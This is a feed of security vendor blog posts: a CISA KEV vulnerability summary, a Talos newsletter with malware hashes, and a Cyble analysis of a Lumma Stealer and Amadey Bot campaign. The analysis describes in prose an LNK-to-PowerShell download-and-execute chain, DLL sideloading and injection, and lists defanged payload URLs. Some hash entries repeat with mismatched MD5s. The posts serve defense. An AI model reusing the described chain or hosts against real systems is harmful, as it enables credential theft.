  1. Regular cybersecurity training for all personnel, particularly those with access to Operational Technology (OT) systems, can help prevent human error and reduce the risk of social engineering attacks. 

  1. Ongoing vulnerability scanning and penetration testing can help identify and address weaknesses before attackers exploit them. Engaging threat intelligence services and staying updated with vulnerability intelligence reports is essential for proactive defense. 

  1. Developing a robust incident response plan and conducting regular security drills ensures that organizations are prepared for a quick and coordinated response to any security incidents that may arise. 

The post Russian Hacktivists Increasingly Tamper with Energy and Water System Controls appeared first on Cyble.

Blog – Cyble – ​Read More

CISA Updates Known Exploited Vulnerabilities Catalog, Adding 3 Critical Flaws

Exploited Vulnerabilities

Overview 

The Cybersecurity and Infrastructure Security Agency (CISA) has recently updated its Known Exploited Vulnerabilities (KEV) Catalog, adding three critical flaws that are currently being actively exploited. These vulnerabilities impact a range of products, from industrial control systems (ICS) to web-based applications. The newly added vulnerabilities include CVE-2023-45727, CVE-2024-11680, and CVE-2024-11667, each affecting high-profile systems in industries such as manufacturing, telecommunications, and energy. 

The first flaw added to the Known Exploited Vulnerabilities (KEV) catalog, CVE-2023-45727, affects North Grid’s Proself product suite, including versions prior to 5.62 of Proself Enterprise/Standard Edition, 1.65 of Proself Gateway Edition, and 1.08 of Proself Mail Sanitize Edition. The second vulnerability, CVE-2024-11680, affects ProjectSend, an open-source file management application.  

The last vulnerability, CVE-2024-11667, impacts several Zyxel firewall products, including the ATP series, USG FLEX series, USG FLEX 50(W), and USG20(W)-VPN series, with versions prior to 5.38 being affected. Organizations using these products are urged to apply patches promptly to mitigate the risks associated with these vulnerabilities. 

Technical Details of the Vulnerabilities 

CVE-2023-45727: Proself Vulnerability in North Grid Proself Systems 

One of the newly cataloged vulnerabilities, CVE-2023-45727, affects North Grid Corporation’s Proself product suite. Specifically, the vulnerability is found in versions prior to 5.62 of Proself Enterprise/Standard Edition, 1.65 of Proself Gateway Edition, and 1.08 of Proself Mail Sanitize Edition. This flaw allows attackers to exploit improper restrictions on XML External Entity (XXE) processing, which can lead to remote unauthenticated attacks. 

By submitting specially crafted XML data, attackers can gain access to sensitive files, including those containing account information. This opens the door for data theft or manipulation. The CVSS score for CVE-2023-45727 is notably high, signaling the severity of this flaw. 

CVE-2024-11680: ProjectSend Authentication Vulnerability 

CVE-2024-11680 addresses an issue in ProjectSend, an open-source file management application. Versions prior to r1720 of ProjectSend are vulnerable to improper authentication, allowing attackers to send malicious HTTP requests to the application’s configuration files. 

Exploiting this flaw, attackers can bypass authentication mechanisms and gain unauthorized access to modify system configurations, create new accounts, and upload malicious content such as webshells and embedded JavaScript

The critical nature of this vulnerability is highlighted by its CVSS score of 9.8, categorizing it as a high-risk flaw with the potential for extensive compromise if left unaddressed. Remote attackers do not require prior access or authentication to exploit this vulnerability, making it even more dangerous to organizations using ProjectSend versions below r1720. 

CVE-2024-11667: Zyxel Path Traversal in Multiple Firewalls 

The third vulnerability in CISA’s latest update is CVE-2024-11667, which affects several Zyxel firewall products. Specifically, the flaw resides in the web management interface of ATP series and USG FLEX series firewalls, as well as USG FLEX 50(W) and USG20(W)-VPN series devices. Versions of these products prior to 5.38 are susceptible to a path traversal vulnerability, which allows attackers to manipulate file paths and potentially download or upload arbitrary files. 

The flaw could allow attackers to access sensitive files or upload malicious software onto affected devices. With a CVSS score of 7.5, this vulnerability is deemed high-risk but not as critical as CVE-2024-11680. However, for organizations relying on Zyxel products to secure their networks, addressing this flaw is essential to prevent unauthorized access and maintain the integrity of their firewalls. 

Sector-Wide Impact of Known Exploited Vulnerabilities 

These newly cataloged vulnerabilities stress the ongoing risks in industrial control systems (ICS) and critical infrastructure. For example, flaws in systems like Proself, ProjectSend, and Zyxel firewalls can expose vulnerable systems to a range of cyberattacks, including unauthorized access, data exfiltration, and service disruption. Such vulnerabilities are particularly concerning for sectors like energy, critical manufacturing, and telecommunications, where any disruption can have far-reaching consequences. 

With CVE-2023-45727, CVE-2024-11680, and CVE-2024-11667 now added to the list of Known Exploited Vulnerabilities, organizations using these products must adopt upgraded cybersecurity measures to defend against attacks. Organizations are strongly encouraged to follow best practices in patch management, including regularly applying vendor-issued patches and updates.  

For example, users of Proself should upgrade to newer versions that address the XXE vulnerability, while ProjectSend users should ensure they are running r1720 or later. Additionally, Zyxel firewall users should promptly update firmware versions to mitigate the path traversal flaw. 

Mitigation and Recommendation Strategies 

To mitigate the risks associated with these vulnerabilities, organizations are advised to implement several key cybersecurity measures: 

  1. Ensure that all systems are regularly updated with the latest security patches to reduce the risk of exploitation from Known Exploited Vulnerabilities. 

  1. Adopt a zero-trust model where all access requests are treated as potentially hostile, requiring stringent verification before granting access. 

  1. By segmenting networks, organizations can contain potential breaches and prevent attackers from moving laterally through critical systems. 

  1. Implement multi-factor authentication (MFA) to protect sensitive systems and reduce the likelihood of unauthorized access. 

  1. Regularly conduct vulnerability scans, penetration testing, and security audits to identify and address weaknesses before they can be exploited. 

Conclusion 

The recent updates to CISA’s Known Exploited Vulnerabilities catalog highlight the urgency to address critical security flaws in widely used products. The vulnerabilities in North Grid’s Proself, ProjectSend, and Zyxel firewall systems can expose businesses to a range of cyber threats, including unauthorized access, data theft, and system manipulation.  

As these vulnerabilities can be leveraged for cyberattacks, organizations must apply timely patches, follow best practices in patch management, and adopt cybersecurity strategies. Implementing security measures such as multi-factor authentication, network segmentation, and regular vulnerability assessments will help organizations protect against potential breaches and reduce the risk of exploitation. 

References 

The post CISA Updates Known Exploited Vulnerabilities Catalog, Adding 3 Critical Flaws appeared first on Cyble.

Blog – Cyble – ​Read More

The adventures of an extroverted cyber nerd and the people Talos helps to fight the good fight

The adventures of an extroverted cyber nerd and the people Talos helps to fight the good fight

Welcome to this week’s edition of the Threat Source newsletter. 

I am unbelievably lucky to do the work that I do. My title is technically ‘Senior Security Strategist’. It’s a very fancy title, but basically: I get to research threats with my colleagues and friends to keep people safe here at Talos. I also get to travel and talk to our customers and communities about that work and how we fight that good fight. This has taken me to some interesting places – from Ukraine to California and lots of places in between. Not bad for a guy from a small town in Alabama.  

This gig isn’t for everyone. You must have some extroverted tendencies, and as the youth would say, some ‘rizz’. It’s not enough to talk about something like, say, ransomware. You need to be able to explain it in high technical detail if needed and then explain it to a board of C-levels and speak the language of business they understand. And you need to do it in an engaging way to keep your audiences bought in. It’s a unique blend of security practitioner expertise and the ability to communicate that to audiences, some technical, some not.  

If you’re thinking this also requires some kind of social media influencer level of Hemsworth caliber good looks and hyper charisma, have no fear. I’m about as much a security influencer as Chris Farley was a Beverly Hills ninja. I am just a security nerd who likes to talk. Like I said – I’m very lucky.  

Sometimes this gig takes you to very unexpected places. A couple of weeks ago I found myself at the Ford Foundation Center for Social Justice. I was there to attend and support the NGO-ISAC annual summit. The NGO-ISAC ‘is a non-profit organization improving the cybersecurity of US-based nonprofits.’ They do amazing work supporting cyber security for non-governmental organizations that help protect and promote civil society. We’re also fortunate at Talos to be a partner with them and donate time and resources to support their mission of helping the helpers.  

We are proud to be partners and volunteer our time with NGO-ISAC and it’s members. If you ever want to be truly humbled, spend time with an NGO and learn about what they do. The energy and heart those people have is incredible and will inspire you. They help feed the hungry, cloth the homeless, protect refugees, promote democracies, and generally help take care of some of the most vulnerable people and institutions our society relies upon. They also traditionally struggle with cybersecurity – security investments and practitioner expertise can be difficult to obtain when your budgets are built upon donations to support your mission. They are the embodiment of fighting the good fight, and we at Talos will always have the time to help them help others.  

While I was there, we debuted a custom NGO version of Backdoors & Breaches I helped co-develop with the NGO-ISAC. It was a real hit, and we ran demo games that resonated very well with the audiences. Helping teach cybersecurity to NGOs is fantastic. If we can help them stay secure, there’s so many others who will be helped by it. Also, keep your eyes peeled for a blog post in January about how we designed and created a custom expansion for Backdoors & Breaches.  

Also, the Ford Foundation? Amazing building. It’s in the heart of NYC and is an island of pure serenity. They have an indoor atrium/park that is next level. They pipe in some absolute jazz bangers throughout the entire building that, mixed with the decor, exudes a class I’ve rarely encountered in my travels. If I could make a blanket out of that entire vibe and wrap myself up in it, I’d do it.  

The one big thing 

QR Codes, am I right? Sometimes you can scan one with your phone and maybe win a free cheeseburger, sometimes it can take you to a fake O365 phishing site. The tricky bit with QR codes in e-mails is how easily they can avoid spam filters. My man Jaeson Schultz did some great research on attacks, prevalence, and detection of QR codes in e-mail messages. The parts on AI-generated QR imagery are fantastic – be careful what you scan! 

Why do I care? 

E-mail phishing and evading defenses are a tried and tested tactic with attackers. QR codes are another method of attack, and because they can be difficult to defang/detect, defenders have to work extra hard to understand those threats and stop them.  

So now what? 

Exercise serious caution when scanning a QR code. If possible, detonate those suspicious QR code e-mails in a sandbox, like Threat Grid

Top security headlines of the week 

At least 97 major water systems in the US have serious cybersecurity vulnerabilities and compliance issues, raising concerns that cyberattacks could disrupt businesses, industry, and the lives of millions of citizens. (Dark Reading

The NSA updated its mobile devices security best practices report. Reboot those phones at least once a week friends.  (ZDNet

The United States and other Western nations released guidance Tuesday designed to evict the China-linked group in the wake of the high-profile hack. (CyberScoop

Can’t get enough Talos? 

Upcoming events where you can find Talos 

AVAR (Dec. 4-6)   

Chennai, India  

Vanja Svancer and Chetan Raghuprasad from Cisco Talos will both present, Vanja will be discussing Exploring Vulnerable Windows Drivers, while Chetan presents Sweet and Spicy Recipes for Government Agencies by SneakyChef.   

Most prevalent malware files from Talos telemetry over the past week  

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 

MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 

VirusTotal: https://www.virustotal.com/gui/file/0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647/details 

Typical Filename: cwjhtmbwgyomzrhbo.exe 

Claimed Product: n/a 

Detection Name: Win.Dropper.Scar::1201  

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca 

MD5: 71fea034b422e4a17ebb06022532fdde 

VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/detection 

Typical Filename: VID001.exe 

Claimed Product: n/a 

Detection Name: Coinminer:MBT.26mw.in14.Talos 

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   

MD5: 200206279107f4a2bb1832e3fcd7d64c  

VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details%C2%A0 

Typical Filename: lsgkozfm.bat  

Claimed Product: N/A  

Detection Name: Win.Dropper.Scar::tpd    

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   

MD5: 71fea034b422e4a17ebb06022532fdde   

VirusTotal: https://www.virustotal.com/gui/file/bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a/details 

Typical Filename: VID001.exe   

Claimed Product: N/A   

Detection Name: RF.Talos.80   

SHA 256: 3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66   

MD5: 8b84d61bf3ffec822e2daf4a3665308c   

VirusTotal: https://www.virustotal.com/gui/file/3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66/details%C2%A0 

Typical Filename: RemComSvc.exe   

Claimed Product: N/A   

Detection Name: W32.3A2EA65FAE-95.SBX.TG   

Cisco Talos Blog – ​Read More

Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot

Manufacturing, Cyberattack, Malware

Key takeaways

  • Cyble Research and Intelligence Labs (CRIL) identified a malicious campaign targeting the manufacturing industry, leveraging a deceptive LNK file disguised as a PDF file.
  • This campaign leverages multiple Living-off-the-Land Binaries (LOLBins), such as ssh.exe, powershell.exe, and mshta.exe, to bypass traditional security mechanisms and remotely execute the next-stage payload.
  • The Threat Actor (TA) used Google Accelerated Mobile Pages (AMP) URL along with a shortened URL to evade detection by traditional URL scanners.
  • The attack heavily relies on file injection techniques, where the TAs execute malicious payloads directly in memory to bypass conventional security mechanisms.
  • The attack chain leverages DLL sideloading and IDATLoader to deploy the Lumma stealer and Amadey bot, enabling the attacker to gain control and exfiltrate sensitive information from the victim’s machine.

Overview

CRIL recently identified a multi-stage cyberattack campaign originating from an LNK file. The initial infection vector remains unknown; however, the attack likely begins with a spear-phishing email, prompting the recipient to click on a link that leads to an LNK shortcut file disguised as a PDF document. The file is hosted on a remote WebDAV share at

hxxp://download-695-18112-001-webdav-logicaldoc[.]cdn-serveri4732-ns.shop/Downloads/18112.2022/Instruction_695-18121-002_Rev.PDF.lnk“.

Upon searching for the file name “695-18121-002_Rev” on Google, we discovered a technical engineering drawing for a component. Additionally, we observed similar samples using the name “Instruction_18112,” which led us to another technical document detailing the installation of a chair. The malicious LNK file hosted on the URL impersonates LogicalDOC, a cloud-based document management system commonly used in Manufacturing and Engineering firms. Based on the targeting and nature of these attacks, we suspect that the campaign is likely targeting the manufacturing industry.

Once executed, the LNK file triggers a command to launch ssh.exe, which subsequently runs a PowerShell command. This PowerShell command fetches and executes an additional malicious payload from a remote server using mshta.exe.

The remote server is accessed via a URL that abuses Google’s Accelerated Mobile Pages (AMP) framework, combined with a shortened URL that redirects to a location hosting malicious PowerShell code.

The PowerShell code then triggers another malicious script hosted on Pastebin, controlled by the TA. This script contains an encoded PowerShell command that downloads a ZIP archive to the Temp directory, extracts its contents, and executes a legitimate executable. The executable, in turn, sideloads a malicious DLL file.

In this sophisticated campaign, the TA uses multiple stages of code injection to deploy the Lumma stealer, which then downloads the Amadey Bot onto the victim’s system. The figure below shows the infection chain.

Infection Chain
Figure 1 – Infection chain

Technical Analysis

Threat Actors are increasingly exploiting LNK files as their initial vector for malware distribution due to their flexibility in executing various commands. In this campaign, they specifically leveraged the Windows SSH client (C:WindowsSystem32OpenSSHssh.exe) as an alternative target in the LNK file’s “Target” field. This approach reduces the likelihood of detection compared to using cmd.exe or powershell.exe as the target. The image below shows the LNK command.

SSH, Link
Figure 2 – LNK using SSH as a target

When a user opens the disguised LNK file, it triggers “ssh.exe” to run a PowerShell command through the ProxyCommand option in ssh.exe. The embedded PowerShell command contains obfuscated content, as shown in the image above. The de-obfuscated code attempts to execute PowerShell content hosted at the AMP URL “hxxps://www.google[.]ca/amp/s/goo.su/IwPQJP” using mshta.exe. In this case, the hosted content contains AES-encrypted data, as shown in the image below.

Encryption
Figure 3 – AES-encrypted content hosted in AMP URL

Upon decryption, the data reveals Base64-encoded content, which is displayed in the image below.

Base64
Figure 4 – Base64-encoded content

The decoded Base64 content reveals an obfuscated PowerShell command, as shown in the image below.

PowerShell
Figure 5 – Obfuscated PowerShell command

This PowerShell command manipulates security protocols and performs the following actions:

  • First, it configures various security protocols, including TLS 1.0, TLS 1.1, TLS 1.2, and SSL 3.0, using the .NET ServicePointManager class.
  • Then, it initiates a web request using Invoke-WebRequest (iwr) to fetch a payload from the URL hxxps://Pastebin[.]com/raw/0v6Vhvpb, which is then immediately executed using Invoke-Expression (iex).

The image below shows the retrieved payload from the Pastebin URL.

Pastebin URL
Figure 6 – Partial PowerShell script fetched from the Pastebin URL

The retrieved content from the Pastebin link consists of a PowerShell script that performs several actions:

  1. The script begins by sanitizing the content fetched from Pastebin, removing newline characters (“n”) and commas (,).
  2. The cleaned string is then decoded from Base64 into binary data.
  3. Using a hardcoded decryption key, the script decrypts the binary data.
  4. Once decrypted, the script extracts a portion of the data starting from the 64th byte to the end, which is the actual code to execute. This code is then converted into a readable PowerShell command using UTF-8 encoding.
  5. Before executing the decoded command, a 2-second delay is introduced with Start-Sleep. Finally, the decoded PowerShell command is executed in memory using Invoke-Expression.

The image below shows the decrypted PowerShell code extracted using the above steps.

PowerShell
Figure 7 – Decrypted PowerShell code

The newly introduced script represents the final stage in delivering malicious files to the system. The script operates as follows:

  1. The script first verifies the system’s internet connectivity by sending HTTP requests to two distinct domains: 360.net and baidu.com. These requests ensure the system is online before proceeding with further actions.
  2. Once the victim’s system is connected to the internet, the script downloads a malicious CPL file named naailq0.cpl from the remote URL hxxps://berb.fitnessclub-filmfanatics.com/naailq0.cpl.
  3. The downloaded CPL file is saved as a ZIP file within the Temp directory. This ZIP file is then copied to a newly created folder under the LocalAppData folder. The folder name is dynamically generated using a GUID (Globally Unique Identifier).
  4. After extraction, the script scans the folder for any executable files (EXEs). Any EXE files found within the extracted contents are then executed.
  5. The script includes a commented-out line that, if activated, would delete the extracted files and folder after execution, potentially covering its tracks.

The image below shows the contents of the downloaded ZIP file. The ZIP file also contains encrypted files, which will be decrypted and loaded in the subsequent stages of infection.

Archive
Figure 8 – Extracted files in the archive

In this case, the script executes “syncagentsrv.exe”, which performs DLL sideloading by loading the malicious “Qt5Network.dll” upon execution. The malicious DLL then reads an encrypted file named “shp” from the same directory, decrypts its contents, and reveals strings such as LoadLibraryA, VirtualProtect, and dbghelp.dll, as shown in the figure below.

Decryption
Figure 9 – Decrypted content

After decryption, the malicious DLL extracts the string “dbghelp.dll” from the decrypted content and utilizes it to load the DLL via the LoadLibraryA API. The “dbghelp.dll” is a Microsoft Windows library designed for debugging and managing symbol information. After loading the DLL, the malicious code employs the VirtualProtect API to modify the memory region permissions of “dbghelp.dll” to PAGE_EXECUTE_READWRITE, as illustrated below.

Permissions
Figure 10 – Modifying permission of dbghelp.dll

It then overwrites the contents of “dbghelp.dll” with the decrypted data and subsequently modifies the memory protection of the overwritten region to PAGE_EXECUTE_READ, as depicted below.

Figure 11 – Modifying the permissions of dbghelp.dll

After modifying the memory protection, the malicious code begins executing the injected content within “dbghelp.dll“. The injected code then proceeds to read another file named “bwvrwtn“, located in the same directory. The file “bwvrwtn” is an encrypted IDAT file containing multiple encrypted chunks, each prefixed with the string “IDAT,” as illustrated below.

IDAT
Figure 12 – IDAT marker

The DLL now searches the strings IDAT, takes four bytes following IDAT, and performs a comparison with C6 A5 79 EA. If the comparison is successful, the DLL proceeds to copy all the data following IDAT into memory, decrypts it using the XOR key, and then decompresses the decrypted content using the RTLDecompressBuffer API, as shown below.

Decompressed Data
Figure 13 – Decompressed data

It then loads a legitimate “pla.dll” from the %syswow64% directory using the LoadLibraryW API. After loading, it changes the memory permissions of “pla.dll” to PAGE_EXECUTE_READWRITE, copies the decrypted content into its memory, changes the permissions to PAGE_EXECUTE_READ, and finally executes the injected code in the “pla.dll” as shown below.

Code Injection
Figure 14 – Executing the injected code

The code within “pla.dll” proceeds to inject malicious code into “more.com” and then executes it. The malicious code in “more.com” is responsible for deploying the final payload by injecting it into a newly created process, “msiexec.exe.” The injected payload is Lumma Stealer – which is capable of stealing sensitive information from the victim’s machine. The figure below shows the memory string of “msiexec.exe” containing Lumma Stealer’s C2 details.

Memory Strings
Figure 15 – Msiexec Process memory strings

Amadey Bot

The TA behind this campaign also deploys the Amadey bot in the “%temp%” directory, employing the same technique of injecting code into “more.com.” This injected code further injects the final Amadey bot payload into “explorer.exe“. To achieve persistence, the malware creates a Task Scheduler entry named “NodeJS Web Framework.” This task is configured to execute a copy of the Amadey bot stored in the %Appdata% directory, as illustrated below.

Persistence
Figure 16 – Task Scheduler for Persistence

The figure below shows the execution flow of Lumma Stealer and Amadey bot.

Execution Flow
Figure 17 – Execution Flow

Conclusion

This multi-stage cyberattack campaign demonstrates the increasing sophistication and adaptability of threat actors. By leveraging various evasion techniques such as URL shortening and AMP URLs, the attackers successfully bypass traditional security mechanisms.

The use of legitimate system tools like ssh.exe and mshta.exe to execute malicious PowerShell commands further illustrates the complexity of the attack. The final payload, which involves the deployment of both Lumma stealer and Amadey bot, highlights the TA’s intent to steal sensitive information and maintain persistent control over compromised systems.

Yara and Sigma rule to detect this campaign, available for download from the Github repository.      

Recommendations

  • The initial breach may occur via spam emails. Therefore, it’s advisable to deploy strong email filtering systems to identify and prevent the dissemination of harmful attachments.
  • Exercise caution when handling email attachments or links, particularly those from unknown senders. Verify the sender’s identity, particularly if an email seems suspicious.
  •  Disable WebDAV if it is not required for business operations to minimize potential attack vectors.
  • Consider disabling the execution of shortcut files (.lnk) originating from remote locations, such as WebDAV links, or implementing policies that require explicit user consent before executing such files.
  • The campaign abused the legitimate ssh utility; hence, it is advised to monitor the activities conducted by the ssh utility and restrict access to limited users.
  • Consider limiting the execution of scripting languages, such as PowerShell and mshta.exe, on user workstations and servers if they are not essential.
  • Implement application whitelisting to ensure only approved and trusted applications and DLLs can be executed on the systems.
  • Monitor AMP links using advanced URL filtering and threat intelligence feeds to detect suspicious activity.
  • Set up network-level monitoring to detect unusual activities or data exfiltration by malware. Block suspicious activities to prevent potential breaches.

MITRE ATT&CK® Techniques

Tactic Technique Procedure
Initial Access (TA0001) Phishing (T1566) The LNK file may be delivered through phishing or spam emails
Execution (TA0002) User Execution:  Malicious Link (T1204.001)    Command and Scripting Interpreter: PowerShell (T1059.001) Execution begins when a user executes the LNK file.
The LNK file executes PowerShell commands.
Defence Evasion (TA0005) Masquerading: Masquerade File Type (T1036.008) Uses LNK files with altered icons to disguise as legitimate
Defense Evasion (TA0005) System Binary Proxy Execution: Mshta (T1218.005) Abuse mshta.exe to proxy execution of malicious files.
Defense Evasion (TA0005)  Obfuscated Files or  
Information (T1027)  
Scripts include packed or encrypted data.
Defense Evasion (TA0005)  System Binary Proxy Execution: Msiexec (T1218.007) msiexec.exe used for proxy execution of malicious payloads
Privilege  
Escalation 
(TA0004) 
DLL Side-Loading (T1574.002 Malicious DLL Side loaded. 
Privilege  
Escalation 
(TA0004) 
Process Injection (T1055 Injects malicious content into explorer.exe and other process.
Persistence (TA0002) Scheduled Task/Job (T1053.005) Adds task schedular entry for persistence.
C&C 
(TA0011) 
Application Layer Protocol 
(T1071
Malware communicates to the C&C server. 
Exfiltration (TA0010) Automated Exfiltration (T1020 Data is exfiltrated after collection 

Indicators Of Compromise

Indicators Indicator Type Description
5b6dc2ecb0f7f2e1ed759199822cb56f5b7bd993f3ef3dab0744c6746c952e36 SHA-256 Instruction_695-18121-002_Rev.PDF.lnk
8ed1af83cf70b363658165a339f45ae22d92c51841b06c568049d3636a04a2a8 SHA-256 Malicious PowerShell Script downloaded from Pastebin(0v6Vhvpb)
7b8958ed2fc491b8e43ffb239cdd757ec3d0db038a6d6291c0fd6eb2d977adc4 SHA-256 Zip file disguised as .cpl
dc36a3d95d9a476d773b961b15b188aa3aae0e0a875bca8857fca18c691ec250 SHA-256 Malicious DLL (Sideloaded)
hxxps://www.google[.]ca/amp/s/goo.su/IwPQJP   hxxps://pastebin[.]com/raw/0v6Vhvpb   hxxps://berb.fitnessclub-filmfanatics[.]com/naailq0.cpl URL remote servers
hxxp://download-695-18112-001-webdav-logicaldoc[.]cdn-serveri4732-ns.shop/Downloads/18112.2022/ URL WebDAV server link hosting malicious LNK file

References

https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-Lumma-infostealers

https://www.rapid7.com/blog/post/2024/03/28/stories-from-the-soc-part-1-idat-loader-to-bruteratel

The post Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot appeared first on Cyble.

Blog – Cyble – ​Read More